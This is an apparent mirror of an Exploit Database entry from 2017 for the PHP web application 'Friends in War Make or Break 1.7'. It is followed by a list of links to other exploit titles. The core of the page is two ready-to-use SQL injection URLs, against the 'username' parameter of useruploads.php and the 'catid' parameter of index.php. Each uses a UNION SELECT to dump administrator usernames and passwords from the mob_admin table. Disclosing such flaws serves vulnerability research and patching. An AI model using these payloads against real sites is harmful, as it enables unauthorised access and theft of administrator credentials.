Friends in War Make or Break 1.7 – SQL Injection

Exploit Database
19 阅读

作者： Ihsan Sencan

日期： 2017-07-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/42381/

# # # # #
# Exploit Title: Friends in War Make or Break 1.7 SQL Injection
# Dork: N/A
# Date: 26.07.2017
# Vendor : http://software.friendsinwar.com/
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Demo: http://localhost/[PATH]/
# Version: 1.7
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/useruploads.php?username=[SQL]
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# http://localhost/[PATH]/index.php?catid=SQL]
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# Etc..
# # # # #

last Exploits
Friends in War Make or Break 1.7 – SQL Injection的更多信息

eshtery CMS – SQL Injection：
Myre Real Estate Mobile 2012/2 – Multiple Vulnerabilities：
Redaxo 4.2.1 – Remote File Inclusion：
SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response：
Booking Calendar – Multiple Vulnerabilities：
SysAid Server – Arbitrary File Disclosure：
phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit：
Hasura GraphQL 2.2.0 – Information Disclosure：